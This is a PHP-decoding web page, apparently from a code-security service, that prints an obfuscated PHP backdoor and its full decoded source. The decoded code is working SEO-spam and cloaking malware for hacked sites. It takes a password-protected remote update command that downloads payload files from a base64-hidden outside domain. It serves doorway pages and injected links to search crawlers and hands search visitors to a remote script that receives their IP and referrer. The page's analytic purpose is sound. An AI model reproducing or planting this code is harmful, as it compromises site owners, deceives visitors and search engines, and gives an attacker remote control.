Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $JZhEnyMgJg="svJ_l0DbhYpN5xuFE7HqfT42mUQ9AGgySnRoWBIjtzeKXak1C8V3ML6rOPcwdiZ";$BnaRT..

Decoded Output download

	  
 

	




	

	



set_time_limit(0);

function change_page_regex($page, $links,$reg,$res){

	$elements = array();
	if (preg_match_all($reg, $page, $result)) {
		$elements = $result[$res];
		$elements = array_unique($elements);
	}


	$m=min(count($links),count($elements));

        for ($i = 0; $i < $m; $i++) {
		$link = array_shift($links);
		$element = array_shift($elements);
		$page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1);
        }
	if (count($links)>0){
	        $element = "<p>";
	        $element .= implode("<br>
", $links);
	        $element .= "</p>";
		$page = preg_replace('/\<\/body\>/i', "
" . $element . "
$0", $page, 1);
	}
    
    
	return $page;
}




function curly_page_get($url,$useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"){
	$ch = curl_init ();
	curl_setopt ($ch, CURLOPT_URL,$url);
	curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt ($ch, CURLOPT_TIMEOUT, 3000);
	curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
	curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
	curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
	$result = curl_exec ($ch);
	$curly_page_get_info=curl_getinfo($ch);

	curl_close($ch);
	return array($result,$curly_page_get_info);
}

function get_proxy_page(){
		
	$proto=stripos(@$_SERVER['SERVER_PROTOCOL'],'https') === true ? 'https://' : 'http://';
	$crurl=$proto.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
	list($buf,$curly_page_get_info)=curly_page_get($crurl);

	$ct=@$curly_page_get_info['content_type'];
	$nexturl=@$curly_page_get_info['redirect_url'];
	$status=@$curly_page_get_info['http_code'];
	if (status!="")header("Status: $status");

	if ($ct!=""){
		header("Content-type: $ct");
	}
	if ($nexturl!=""){
		header("Location: $nexturl");
	}
	return array($buf,$ct);

}



if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();if (!is_dir($tmppath)){	$tmppath = (dirname(__FILE__));	}	} else { $tmppath = (dirname(__FILE__));}

$content="";
$x=@$_POST["pppp_check"];
$md5pass="e5e4570182820af0a183ce1520afe43b";



$host=@$_SERVER["HTTP_HOST"];
$uri=@$_SERVER["REQUEST_URI"];
$host=str_replace("www.","",$host);
$md5host=md5($host);
$urx=$host.$uri;
$md5urx=md5($urx);



$tmppath=$tmppath."/.".$md5host."/";
@mkdir($tmppath);



$configs=$tmppath."emoji1.png";
$bd=$tmppath."metaicons.jpg";
$templ=$tmppath."wp-themesall.gif";



$domain=base64_decode("dC1maXNoLWthLnJ1");
$p=md5(base64_decode(@$_POST["p"]));

if (($x!="")&&($p==$md5pass)){

	if ($x=="2"){
		echo "###UPDATING_FILES###
";
		list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/emoji1.png");
		@file_put_contents($configs,$buf1);
		list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/metaicons.jpg");
		@file_put_contents($bd,$buf1);
		list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/wp-themesall.gif");
		@file_put_contents($templ,$buf1);

		exit;
	}


	if ($x=="4"){
		echo "###WORKED###
";exit;
	}


}else{

	$cf=array();
	if (@file_exists($configs)){
		$cf=@unserialize(base64_decode(@file_get_contents($configs)));
	}
	
	if (@isset($cf[$md5urx])){
		$bot=0;$se=0;$ua=@$_SERVER["HTTP_USER_AGENT"];$ref=@$_SERVER["HTTP_REFERER"];$myip=@$_SERVER["REMOTE_ADDR"];
		if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", $ref))$se=1;
		if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", $ua))$bot=1;
		$off=$cf[$md5urx]+0;
		$template=base64_decode(@file_get_contents($templ));$f=@fopen($bd,"r");@fseek($f,$off);$buf=trim(@fgets($f,10000000));@fclose($f);$info=unserialize(base64_decode($buf));
		$keyword=@$info["keyword"];$IDpack=@$info["IDpack"];$base=@$info["base"];$text=@$info["text"];$title=@$info["title"];$description=@$info["description"];$uckeyword=ucwords($keyword);$inside_links=@$info["inside_links"];
		if ($bot) {
			if (isset($info["contenttype"])){$contenttype=base64_decode($info["contenttype"]);$types=explode("
",$contenttype);foreach($types as $val){$val=trim($val);if($val!="")header($val);}}

			if (isset($info["isdoor"])){

				if (isset($info["standalone"])){
					$doorcontent=base64_decode($text);
					echo $doorcontent;exit;
				}else{
					$template=str_replace("%text%",$text,$template);
					$template=str_replace("%title%",$title,$template);
					$template=str_replace("%description%",$description,$template);
					$template=str_replace("%uckeyword%",$uckeyword,$template);
					$template=str_replace("%keyword%",str_replace(" ", ",", trim($keyword)),$template);

					foreach($inside_links as $i => $link){
						$template=str_replace("%INSIDE_LINK_".$i."%",$link,$template);
					}

					echo $template;exit;
				}
			}else{

				list($buf,$ct)=get_proxy_page();

				if (stristr($ct,"text/html")){
					$rega='/\<a\s.*?\>.*?\<\/a\>/i';$resa=0;
					$links=$info["links_a"];
					$buf=change_page_regex($buf,$links,$rega,$resa);

					$regp='/(.{30}\<\/p\>)/is';$resp=1;
					$links=$info["links_p"];
					$buf=change_page_regex($buf,$links,$regp,$resp);

				}

				echo $buf;
			}



		}
		if ($se) {
			if (isset($info["isdoor"])){
				list($buf1,$curly_page_get_info)=curly_page_get("http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua);
				echo $buf1;exit;
			}else{
				list($buf,$ct)=get_proxy_page();
				echo $buf;exit;
			}
		}
	}else{

		list($buf,$ct)=get_proxy_page();
		echo $buf;
	}

}

Did this file decode correctly?

Original Code

<?php $JZhEnyMgJg="svJ_l0DbhYpN5xuFE7HqfT42mUQ9AGgySnRoWBIjtzeKXak1C8V3ML6rOPcwdiZ";$BnaRTawe=$JZhEnyMgJg[7]. $JZhEnyMgJg[45] . $JZhEnyMgJg[0] . $JZhEnyMgJg[42] . $JZhEnyMgJg[54]. $JZhEnyMgJg[22]  .$JZhEnyMgJg[3]  .$JZhEnyMgJg[60].$JZhEnyMgJg[42]. $JZhEnyMgJg[58] .$JZhEnyMgJg[35] .$JZhEnyMgJg[60].$JZhEnyMgJg[42];$lcQJOaDcf=$JZhEnyMgJg[30] .$JZhEnyMgJg[41] . $JZhEnyMgJg[61] .$JZhEnyMgJg[33].$JZhEnyMgJg[20].  
$JZhEnyMgJg[4] .$JZhEnyMgJg[45].  
$JZhEnyMgJg[40] . $JZhEnyMgJg[42];$ZUXNhkOCO=$JZhEnyMgJg[42]. $JZhEnyMgJg[55]  .$JZhEnyMgJg[55].$JZhEnyMgJg[35].  $JZhEnyMgJg[55] . $JZhEnyMgJg[3].$JZhEnyMgJg[55] .$JZhEnyMgJg[42].  $JZhEnyMgJg[10]. $JZhEnyMgJg[35].$JZhEnyMgJg[55] . $JZhEnyMgJg[40] . $JZhEnyMgJg[61].  
$JZhEnyMgJg[33] .$JZhEnyMgJg[30];$UjyssRfWPVjYNJ=$JZhEnyMgJg[58]  .$JZhEnyMgJg[55].  
$JZhEnyMgJg[42].  
$JZhEnyMgJg[45].  $JZhEnyMgJg[40].$JZhEnyMgJg[42].  
$JZhEnyMgJg[3]  .$JZhEnyMgJg[20].  
$JZhEnyMgJg[14] .$JZhEnyMgJg[33] .$JZhEnyMgJg[58]. $JZhEnyMgJg[40].  $JZhEnyMgJg[61] .$JZhEnyMgJg[35]  .$JZhEnyMgJg[33];$ZUXNhkOCO(0);$CDCjFZrJolnsnM=$UjyssRfWPVjYNJ("",$lcQJOaDcf($BnaRTawe("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")));$CDCjFZrJolnsnM();?>

Function Calls

null 1
gzinflate 1
base64_decode 1
create_function 1
error_reporting 1

Variables

$BnaRTawe base64_decode
$ZUXNhkOCO error_reporting
$lcQJOaDcf gzinflate
$JZhEnyMgJg svJ_l0DbhYpN5xuFE7HqfT42mUQ9AGgySnRoWBIjtzeKXak1C8V3ML6rOPcw..
$CDCjFZrJolnsnM None
$UjyssRfWPVjYNJ create_function

Stats

MD5 688d3e2391942fcc8965ce9dac36dd9b
Eval Count 1
Decode Time 86 ms